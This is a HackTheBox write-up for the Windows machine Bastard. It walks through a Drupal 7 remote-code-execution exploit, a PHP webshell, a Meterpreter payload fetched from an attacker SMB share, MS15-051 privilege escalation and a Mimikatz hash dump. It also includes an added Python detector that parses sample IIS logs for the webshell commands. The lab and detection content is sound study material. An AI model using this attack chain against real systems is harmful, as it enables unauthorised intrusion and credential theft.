HackTheBox - Bastard - 10.10.10.9

Bastard is a medium-rated Windows Server 2008 R2 machine on hackthebox.eu.

Summary

Bastard is not overly challenging; however, it requires some knowledge of PHP in order to modify and use the proof of concept needed for initial entry. This machine demonstrates the potential severity of vulnerabilities in content management systems.

Recon and Scanning

Nmap Results

From the ports shown here I can see that this is a Windows box running IIS 7.5, meaning that we are dealing with a Windows Server 2008 R2 box.

Drupal Exploit

The fact that Drupal 7 is also listed brings to mind this exploit for Drupal 7.x CMS applications, which allows unauthenticated remote code execution. For the script to work we need to know the REST endpoint and the IP of the server; to find the REST endpoint I will use GoBuster with the dirbuster directory-list-2.3-medium.txt wordlist.

Directory Busting to find the REST endpoint

Bingo, we now have the URL of the REST endpoint, /rest. Now we can download the exploit script and fill in the necessary parameters.

Getting a Shell as iusr

First we will need to install the php-curl library from apt, which can be done with:

Next, we need to modify the script from Exploit DB to include the REST endpoint, the IP of Bastard, the name of the PHP webshell to be placed and the contents of that PHP file; below are the values that I used.

Specifically I changed the contents of the webshell to be,

This will give us a nicer shell.

Running the Exploit

Now that we have modified our PHP script, we can run it with the following command:

Now if we visit the given URL and append ?cmd=whoami, we can see that we have a shell as nt authority\iusr.

Priv Esc to Administrator

Generating a Meterpreter Payload

To start things off, I will generate an executable Meterpreter payload so that we can get a Meterpreter session instead of this PHP webshell.

The command to generate a .exe payload is:

• Replacing LHOST with your HTB IP
• Replacing LPORT with a port of your choosing

Setting Up Metasploit

To get a Meterpreter session we first need to upload our msf.exe file to the server. For this I will use Impacket's smbserver.py to spin up an SMB share in our current working directory, then we will use the Windows copy command to get the file onto the machine.

To start an SMB server simply run:

Now that the SMB server is running we can enter copy \\10.10.14.23\evilshare\msf.exe msf.exe into our PHP webshell.

We can then open the Metasploit console and use exploit/multi/handler to receive the callback from our payload.

Next, set the payload to the same one used with msfvenom, windows/x64/meterpreter/reverse_tcp.

• Set LHOST to your HTB IP
• Set LPORT to the one from MSFVenom
• Now type exploit to start the listener

Popping a Meterpreter Shell

Now that the listener is running, we can go back to our webshell and simply enter the msf.exe command like this:

Bingo! We got a Meterpreter Shell!
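From the defender's side, every step of the webshell phase above (the ?cmd=whoami check, the copy from the SMB share, and launching msf.exe) leaves a request in the IIS logs. The following is an added example, not part of the original writeup: a small Python parser over constructed IIS W3C log lines that flags command-style query parameters on PHP files and UNC paths or executables inside the command. The log lines, the shell.php name and the parameter list are assumptions.

```python
import re
from urllib.parse import parse_qs

# Constructed sample of an IIS W3C log (not taken from the box); the field
# order is the default IIS 7.5 layout named in the #Fields header.
SAMPLE_LOG = """#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2018-01-01 10:00:01 10.10.10.9 GET /rest/user/login - 80 - 10.10.14.23 python-requests/2.18 200 0 0 12
2018-01-01 10:00:05 10.10.10.9 GET /shell.php cmd=whoami 80 - 10.10.14.23 Mozilla/5.0 200 0 0 3
2018-01-01 10:00:09 10.10.10.9 GET /shell.php cmd=copy+%5C%5C10.10.14.23%5Cevilshare%5Cmsf.exe+msf.exe 80 - 10.10.14.23 Mozilla/5.0 200 0 0 40
2018-01-01 10:00:11 10.10.10.9 GET /shell.php cmd=msf.exe 80 - 10.10.14.23 Mozilla/5.0 200 0 0 5
2018-01-01 10:01:00 10.10.10.9 GET /index.php q=node/1 80 - 10.10.14.50 Mozilla/5.0 200 0 0 8
"""

# Query parameters commonly used by one-line PHP webshells to carry a command.
COMMAND_PARAMS = {"cmd", "exec", "command", "c"}
# A UNC path in the command (\\host\share\...) suggests a file being pulled
# from an attacker-controlled SMB share, as with the copy step in the writeup.
UNC_RE = re.compile(r"\\\\[\w.\-]+\\")
EXE_RE = re.compile(r"\b[\w\-]+\.exe\b", re.IGNORECASE)


def find_webshell_hits(log_text):
    """Return one dict per request that looks like webshell command execution."""
    hits = []
    for line in log_text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) < 14:
            continue  # truncated or non-standard line, skip it
        time, stem, query, client = fields[1], fields[4], fields[5], fields[8]
        if not stem.lower().endswith(".php") or query == "-":
            continue
        params = parse_qs(query)  # decodes '+' and %5C back to spaces and backslashes
        for name in sorted(COMMAND_PARAMS & set(params)):
            command = params[name][0]
            reasons = ["command-style parameter '%s' on a PHP file" % name]
            if UNC_RE.search(command):
                reasons.append("UNC path: file copied from a remote SMB share")
            if EXE_RE.search(command):
                reasons.append("executable referenced in command")
            hits.append({"time": time, "client": client, "stem": stem,
                         "command": command, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in find_webshell_hits(SAMPLE_LOG):
        print(hit["time"], hit["client"], hit["stem"], repr(hit["command"]), "; ".join(hit["reasons"]))
```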

IUSR to SYSTEM

Windows Exploit Suggester

As this is an older version of Windows Server, we will first load post/multi/recon/local_exploit_suggester to get a list of possible privilege escalations.

Unfortunately, the exploit we need is not in that list. The one we need is MS15-051; I found this out by trial and error, as an unpatched Server 2008 R2 system is vulnerable to it.

MS15-051 Metasploit Module

Luckily for us, Metasploit has a module for MS15-051, exploit/windows/local/ms15_051_client_copy_image

The parameters we need to set are:

• LHOST, our HTB IP
• LPORT, a local port of your choosing
• SESSION, our Meterpreter session number
• TARGET, 1 as we are attacking 64-bit Windows

A Meterpreter Session as SYSTEM

Now that the options are set we can type exploit and wait for a reverse connection.

Nice, we now have a shell as SYSTEM.

User and Root Flags

We can also now get the root and user flags.

Beyond Root

Now that we have rooted the machine we can load the Mimikatz Meterpreter module and dump the SAM hashes.

Respect

If you enjoyed the write up or found it useful consider + repping my htb profile linked below:
